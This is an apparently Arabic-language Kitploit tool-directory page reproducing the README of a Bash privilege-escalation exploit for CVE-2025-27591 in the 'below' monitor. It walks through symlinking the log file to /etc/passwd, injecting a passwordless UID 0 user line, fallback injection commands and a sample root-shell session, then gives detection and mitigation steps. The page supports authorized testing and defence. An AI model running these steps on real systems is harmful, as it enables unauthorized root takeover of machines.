Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — استغلال ثغرة تصعيد صلاحيات قائم على Bash يستهدف أداة مراقبة أداء النظام `below`. هذا الاستغلال المُجدَّد يستغل ثغرة في آلية التسجيل (symlink) لحقن مستخدم root في `/etc/passwd`، مما يُحقق وصولًا كاملًا للجذر. | Kitploit
أدوات/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

استغلال ثغرة تصعيد صلاحيات قائم على Bash يستهدف أداة مراقبة أداء النظام `below`. هذا الاستغلال المُجدَّد يستغل ثغرة في آلية التسجيل (symlink) لحقن مستخدم root في `/etc/passwd`، مما يُحقق وصولًا كاملًا للجذر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

Buy me a knowledge

استغلال CVE-2025-27591 - هجوم الرابط الرمزي لـ Below Logger

استغلال لتصعيد الامتيازات يعتمد على Bash ويستهدف أداة مراقبة أداء النظام below. هذا الاستغلال المُجدد يستغل ثغرة الرابط الرمزي في آلية التسجيل لحقن مستخدم جذر في /etc/passwd، محققًا وصولاً كاملاً كجذر.

الإسناد

اكتشف وأبلغ به Matthias Gerstner @ SUSE - التنبيه الأمني

تفاصيل الثغرة

  • CVE: CVE-2025-27591
  • المكون المتأثر: /usr/bin/below (مراقب أداء النظام من فيسبوك)
  • الإصدارات المتأثرة: إصدارات below مع أدلة سجلات قابلة للكتابة عالميًا
  • نوع الثغرة: هجوم رابط رمزي / تصعيد امتيازات
  • ناقل الهجوم: /var/log/below/error_root.log → /etc/passwd
  • نقاط CVSS: عالية (تصعيد امتيازات إلى جذر)

نظرة عامة

تقوم أداة المراقبة below بتسجيل الأخطاء في /var/log/below/error_root.log عند التشغيل بصلاحيات مرتفعة. إذا كان دليل السجلات قابلاً للكتابة عالميًا، يمكن للمهاجم:

  1. إنشاء رابط رمزي من error_root.log إلى /etc/passwd
  2. تشغيل أمر below record لكتابة رسائل الخطأ في الرابط الرمزي
  3. حقن إدخال مستخدم ضار يدويًا بـ UID=0 (صلاحيات الجذر)
  4. الحصول على شل جذر باستخدام المستخدم المُنشأ حديثًا

يقوم هذا الاستغلال بأتمتة العملية بالكامل مع آليات تراجع ذكية للتعامل مع تكوينات النظام المختلفة.

مخطط تدفق الاستغلال

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

التفاصيل الفنية

خطوات الاستغلال

  1. مرحلة الفحص المسبق

    • التحقق من وجود الدليل /var/log/below
    • التحقق من أن الدليل لديه صلاحيات الكتابة العالمية (o+w)
    • اختبار القدرة على إنشاء الروابط الرمزية
  2. مرحلة الإعداد

    • إزالة أي ملف error_root.log موجود
    • إنشاء رابط رمزي: /var/log/below/error_root.log → /etc/passwd
    • التحقق من أن الرابط الرمزي يشير إلى الهدف الصحيح
  3. مرحلة الحقن (الطريقة الأساسية)

    • تشغيل sudo below record في الخلفية
    • السماح للعملية بالتشغيل لمدة 3 ثوانٍ لتفعيل تسجيل الأخطاء
    • إنهاء العملية لمنع التسجيل المستمر
    • التحقق مما إذا كانت رسائل الخطأ قد أفسدت /etc/passwd بطريقة مفيدة
  4. مرحلة الحقن (طرق التراجع)

    • الطريقة 1: الإلحاق المباشر عبر الرابط الرمزي (echo >> symlink)
    • الطريقة 2: استخدام sudo مع tee (sudo tee -a)
  5. مرحلة الحصول على الشل

    • التحقق من وجود المستخدم الضار في /etc/passwd

بنية الحمولة

يتبع إدخال /etc/passwd المُحقن هذا التنسيق:

root@kitploit:~
username::0:0:username:/root:/bin/bash

تحليل الحقول:

  • username: اسم المستخدم المُقدم من المستخدم (الافتراضي: "0xdtc")
  • ::: حقل كلمة مرور فارغ (لا حاجة لكلمة مرور)
  • 0:0: UID=0، GID=0 (صلاحيات الجذر)
  • username: حقل GECOS (وصف المستخدم)
  • /root: الدليل الرئيسي
  • /bin/bash: شل تسجيل الدخول

المتطلبات الأساسية

  • نظام مستهدف يحتوي على الثنائي below القابل للاستغلال
  • يجب أن يكون الدليل /var/log/below قابلاً للكتابة عالميًا
  • يجب أن يكون لدى المستخدم صلاحيات sudo لتنفيذ below record
  • بيئة Bash shell

الاستخدام

التنفيذ الأساسي

root@kitploit:~
# Make script executable
chmod +x CVE-2025-27591

# Run the exploit
./CVE-2025-27591

التوجيهات التفاعلية

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser

مثال على المخرجات

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc

[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable

[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter

root@kali:/tmp# whoami
root

الميزات

التعامل الذكي مع العوائق

يتضمن البرنامج النصي آليات تراجع متعددة للتعامل مع تكوينات النظام المختلفة:

  1. التعامل مع الملفات الموجودة

    • يكتشف تلقائيًا ويزيل ملفات السجلات الموجودة
    • يتعامل مع كل من الملفات العادية والروابط الرمزية الموجودة
    • يتحقق من هدف الرابط الرمزي قبل المتابعة
  2. طرق الحقن المتعددة

    • الأساسية: التشغيل عبر تسجيل أخطاء below record
    • التراجع 1: الإلحاق المباشر بالرابط الرمزي
    • التراجع 2: الكتابة المميزة باستخدام sudo tee
  3. إدارة العمليات

    • إنهاء عمليات below العالقة تلقائيًا
    • يمنع استنزاف الموارد
    • يتعامل مع تنظيف العمليات عند الفشل
  4. كشف إعادة التشغيل

    • يتحقق مما إذا كانت الحمولة موجودة بالفعل في /etc/passwd
    • يتجاوز الاستغلال إذا تم إنشاء المستخدم بالفعل
    • يحصل مباشرة على الشل عند إعادة التشغيل

ميزات جودة الكود

  • تعليقات شاملة: كل دالة وخطوة حرجة موثقة
  • عناوين الأقسام: الكود منظم في أقسام منطقية
  • معالجة الأخطاء: فحص أخطاء صحيح وتغذية راجعة للمستخدم
  • خروج نظيف: معالجات مصائد للتنظيف الأنيق عند الفشل
  • تبعيات ضئيلة: Bash نقي مع أدوات Unix قياسية

هيكل الملفات

root@kitploit:~
.
├── CVE-2025-27591           # Main exploitation script
├── README.md           # This documentation
└── /tmp/exploit_payload # Temporary payload file (created at runtime)

التحقق

بعد الاستغلال الناجح، تحقق من وصول الجذر:

root@kitploit:~
# Check current user
root@target:/tmp# whoami
root

# Check user ID and groups
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Verify user in /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Read root-only files
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]

التنظيف

إذا كنت بحاجة إلى إزالة المستخدم الضار بعد الاختبار:

root@kitploit:~
# Remove the injected user from /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd

# Remove any leftover symlinks
rm -f /var/log/below/error_root.log

استبدل username باسم المستخدم الفعلي الذي استخدمته أثناء الاستغلال.

الكشف والتخفيف

طرق الكشف

  1. مراقبة تكامل الملفات

    root@kitploit:~
    # Monitor /etc/passwd for unauthorized changes
    aide --check
    
  2. كشف الروابط الرمزية

    root@kitploit:~
    # Check for suspicious symlinks in log directories
    find /var/log -type l -ls
    
  3. سجلات التدقيق

    root@kitploit:~
    # Check for suspicious sudo usage
    grep "below record" /var/log/auth.log
    

استراتيجيات التخفيف

  1. إصلاح صلاحيات الدليل

    root@kitploit:~
    # Remove world-writable permission from log directory
    sudo chmod 755 /var/log/below
    
  2. سياسات AppArmor/SELinux

    • تنفيذ ضوابط الوصول الإلزامية
    • تقييد مواقع كتابة ملفات الثنائي below
  3. تحديث Below

    • تطبيق التصحيحات الأمنية من Facebook/Meta
    • استخدام تحديثات مدير الحزم
  4. مراقبة /etc/passwd

    • إعداد مراقبة تكامل الملفات (AIDE، Tripwire)
    • التنبيه عند إضافة مستخدمين بـ UID=0

إخلاء مسؤولية قانوني

هذا الاستغلال مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي لديك إذن صريح لإجراء اختبار أمني عليها. لا يتحمل المؤلف(ون) أي مسؤولية عن سوء استخدام هذه الأداة.

باستخدام هذا الاستغلال، فإنك تقر بأنك:

  • لديك التفويض المناسب لاختبار النظام المستهدف
  • تفهم القوانين واللوائح المعمول بها
  • تتحمل المسؤولية الكاملة عن أفعالك

المستودع: https://github.com/0xDTC/ المؤلف: Divine Clown (0xDTC) الترخيص: للأغراض التعليمية فقط آخر تحديث: 2025-11-13

تنزيل الأداة
  • تعطيل مصائد التنظيف لمنع الإزالة
  • تشغيل su <username> للحصول على شل الجذر